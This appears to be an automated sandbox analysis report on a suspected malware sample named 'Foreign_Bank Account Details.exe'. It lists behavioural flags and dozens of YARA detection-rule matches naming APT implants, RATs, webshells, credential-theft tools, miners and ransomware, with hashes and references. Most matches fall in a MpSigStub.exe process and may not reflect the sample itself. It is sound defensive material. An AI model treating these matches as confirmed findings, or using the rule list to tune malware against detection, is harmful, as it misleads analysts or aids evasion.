Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Hack Deep Panda - htran-exe Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Unidentified Implant by APT29 Author: US CERT
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[... Author: FR/ANSSI/SDO
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Detects Pupy backdoor Author: Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: HackTool_MSIL_SharPersist_2 Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: CredTheft_MSIL_ADPassHunt_2 Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Identifies GoRat malware in memory based on strings. Author: FireEye
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Webshells Auto-generated - file vanquish.exe Author: Yara Bulk Rule Generator by Florian Roth
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: probable petya ransomware using eternalblue, wmic, psexec Author: ian.ahl@fireeye.com @tekdefense, nicholas.carr@mandiant.com @itsreallynick
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: 9002 Identifying Strings Author: Seth Hardy
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: APT_DeputyDog_Fexel Author: ThreatConnect Intelligence Research Team
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: Mirage Identifying Strings Author: Seth Hardy
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: gh0st Author: https://github.com/jackcr/
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: gholeeV1 Author: unknown
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html Author: unknown
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: NetWiredRC Author: Jean-Philippe Teissier / @Jipe_
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: PoisonIvy_3 Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR Matched rule: CVE_2018_4878_0day_ITW Author: unknown
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Process Stats: CPU usage > 98%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process Stats: CPU usage > 98%
PE file contains strange resources
Source: Foreign_Bank Account Details.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe.41.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCopyAccelerator.exe.41.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpDlpCmd.exe.41.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe0.41.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCopyAccelerator.exe0.41.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpAsDesc.dll.41.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpOAV.dll.41.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpUxAgent.dll.41.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpAsDesc.dll0.41.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpOAV.dll0.41.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Section loaded: edgegdi.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\MpSigStub.exe Section loaded: edgegdi.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Section loaded: edgegdi.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Section loaded: sfc.dll
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Section loaded: phoneinfo.dll
Creates driver files
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-f54ed867.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\Drivers\WdBoot.sys
Deletes files inside the Windows folder
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File deleted: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\1.1.18500.10_to_1.1.18600.4_mpengine.dll._p
Found potential string decryption / allocating functions
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: String function: 00007FF650CF0DB4 appears 56 times
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: String function: 00007FF650CF0D88 appears 41 times
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: String function: 00007FF650D4BAAC appears 36 times
Contains functionality to call native functions
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CFC444 NtQueryInformationProcess,NtQueryInformationProcess,FindCloseChangeNotification,CloseHandle, 42_2_00007FF650CFC444
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D05B80 ReadFile,FlushFileBuffers,SetEndOfFile,NtSetInformationFile, 42_2_00007FF650D05B80
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D05DB4 NtQueryInformationFile,NtQueryInformationFile,RtlNtStatusToDosError, 42_2_00007FF650D05DB4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CF9FF0 NtSetInformationFile, 42_2_00007FF650CF9FF0
Sample file is different than original file name gathered from version info
Source: Foreign_Bank Account Details.exe, 00000001.00000000.16839912870.0000000000418000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamefigurmrk.exe vs Foreign_Bank Account Details.exe
Yara detected Winexe tool
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a7b2b8a.201.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a7b1586.200.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c67ca.70.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c6d17.71.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c7264.72.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c67ca.166.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a70f33e.138.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c7264.164.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c6d17.165.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Detected potential crypto function
Uses 32bit PE files
Source: Foreign_Bank Account Details.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 35.3.MpSigStub.exe.15b1ad30826.62.raw.unpack, type: UNPACKEDPE Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1b9c89b2.43.raw.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 35.3.MpSigStub.exe.15b1b9c89b2.43.raw.unpack, type: UNPACKEDPE Matched rule: Derusbi_Kernel_Driver_WD_UDFS date = 2015-12-15, hash4 = e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59, hash3 = 6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58, hash2 = 50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a, author = Florian Roth, description = Detects Derusbi Kernel Driver, reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016
Source: 35.3.MpSigStub.exe.15b1b9c89b2.43.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 35.3.MpSigStub.exe.15b1a7d1391.177.raw.unpack, type: UNPACKEDPE Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1b59d455.123.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1b59d455.123.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1b59e859.148.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1b59e859.148.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1bf2fb91.211.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1b41327e.91.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 35.3.MpSigStub.exe.15b1a7cea69.179.raw.unpack, type: UNPACKEDPE Matched rule: XOR_4byte_Key date = 2015-12-15, author = Florian Roth, description = Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan), reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1bb541e6.101.raw.unpack, type: UNPACKEDPE Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 35.3.MpSigStub.exe.15b1bb541e6.101.raw.unpack, type: UNPACKEDPE Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 35.3.MpSigStub.exe.15b1bb541e6.101.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 35.3.MpSigStub.exe.15b1bb541e6.101.raw.unpack, type: UNPACKEDPE Matched rule: APT_APT41_POISONPLUG date = 2019-08-07, hash4 = 3e6c4e97cc09d0432fbbbf3f3e424d4aa967d3073b6002305cd6573c47f0341f, hash3 = f4d57acde4bc546a10cd199c70cdad09f576fdfe66a36b08a00c19ff6ae19661, hash2 = 5d971ed3947597fbb7e51d806647b37d64d9fe915b35c7c9eaf79a37b82dab90, author = Florian Roth, description = Detects APT41 malware POISONPLUG, reference = https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html, score = 2eea29d83f485897e2bac9501ef000cc266ffe10019d8c529555a3435ac4aabd
Source: 35.3.MpSigStub.exe.15b1bb541e6.101.raw.unpack, type: UNPACKEDPE Matched rule: APT_MAL_HOPLIGHT_NK_HiddenCobra_Apr19_3 date = 2019-04-13, hash3 = ddea408e178f0412ae78ff5d5adf2439251f68cad4fd853ee466a3c74649642d, hash2 = 05feed9762bc46b47a7dc5c469add9f163c16df4ddaafe81983a628da5714461, hash1 = 2151c1977b4555a1761c12f151969f8e853e26c396fa1a7b74ccbaf3a48f4525, author = Florian Roth, description = Detects HOPLIGHT malware used by HiddenCobra APT group, reference = https://www.us-cert.gov/ncas/analysis-reports/AR19-100A
Source: 35.3.MpSigStub.exe.15b1b78484d.88.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 35.3.MpSigStub.exe.15b1bf798f9.36.raw.unpack, type: UNPACKEDPE Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 35.3.MpSigStub.exe.15b1bf2fb91.132.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1c00879a.77.unpack, type: UNPACKEDPE Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 35.3.MpSigStub.exe.15b1c00879a.77.unpack, type: UNPACKEDPE Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 35.3.MpSigStub.exe.15b1b09d292.197.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 35.3.MpSigStub.exe.15b1b59d455.107.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1b59d455.107.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.raw.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bc1013a.56.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PDB_Strings_Keylogger_Backdoor date = 2018-03-23, author = Florian Roth, description = Detects PDB strings used in backdoors or keyloggers, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1a7b2b8a.201.raw.unpack, type: UNPACKEDPE Matched rule: APT_apt_duqu2_loaders copyright = Kaspersky Lab, description = Rule to detect Duqu 2.0 samples, version = 1.0, last_modified = 2015-06-09
Source: 35.3.MpSigStub.exe.15b1a7b2b8a.201.raw.unpack, type: UNPACKEDPE Matched rule: Oilrig_IntelSecurityManager date = 2018-01-19, author = Eyal Sela, description = Detects OilRig malware, reference = Internal Research
Source: 35.3.MpSigStub.exe.15b1a7b2b8a.201.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1a7b2b8a.201.raw.unpack, type: UNPACKEDPE Matched rule: apt_duqu2_loaders copyright = Kaspersky Lab, description = Rule to detect Duqu 2.0 samples, version = 1.0, last_modified = 2015-06-09
Source: 35.3.MpSigStub.exe.15b1bde4c13.118.raw.unpack, type: UNPACKEDPE Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 35.3.MpSigStub.exe.15b1bde4c13.118.raw.unpack, type: UNPACKEDPE Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 35.3.MpSigStub.exe.15b1bde4c13.118.raw.unpack, type: UNPACKEDPE Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 35.3.MpSigStub.exe.15b1b09d292.124.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 35.3.MpSigStub.exe.15b1c2da78e.186.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.raw.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1bc1013a.25.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_PDB_Strings_Keylogger_Backdoor date = 2018-03-23, author = Florian Roth, description = Detects PDB strings used in backdoors or keyloggers, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 35.3.MpSigStub.exe.15b1b352d6a.96.raw.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: 35.3.MpSigStub.exe.15b1c4ed472.82.raw.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 35.3.MpSigStub.exe.15b1c4ed472.82.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 35.3.MpSigStub.exe.15b1c4ed472.82.raw.unpack, type: UNPACKEDPE Matched rule: APT_PupyRAT_PY date = 2017-02-17, hash1 = 8d89f53b0a6558d6bb9cdbc9f218ef699f3c87dd06bc03dd042290dedc18cb71, author = Florian Roth, description = Detects Pupy RAT, reference = https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1c4ed472.82.raw.unpack, type: UNPACKEDPE Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 35.3.MpSigStub.exe.15b1c4ed472.82.raw.unpack, type: UNPACKEDPE Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 35.3.MpSigStub.exe.15b1bb549ea.103.raw.unpack, type: UNPACKEDPE Matched rule: APT_DNSpionage_Karkoff_Malware_Apr19_1 date = 2019-04-24, hash4 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, hash3 = 5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c, hash2 = b017b9fc2484ce0a5629ff1fed15bca9f62f942eafbb74da6a40f40337187b04, hash1 = 6a251ed6a2c6a0a2be11f2a945ec68c814d27e2b6ef445f4b2c7a779620baa11, author = Florian Roth, description = Detects DNSpionage Karkoff malware, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
Source: 35.3.MpSigStub.exe.15b1bb549ea.103.raw.unpack, type: UNPACKEDPE Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 35.3.MpSigStub.exe.15b1bb549ea.103.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_DropperBackdoor_Keywords date = 2019-04-24, hash1 = cd4b9d0f2d1c0468750855f0ed352c1ed6d4f512d66e0e44ce308688235295b5, author = Florian Roth, description = Detects suspicious keywords that indicate a backdoor, reference = https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html
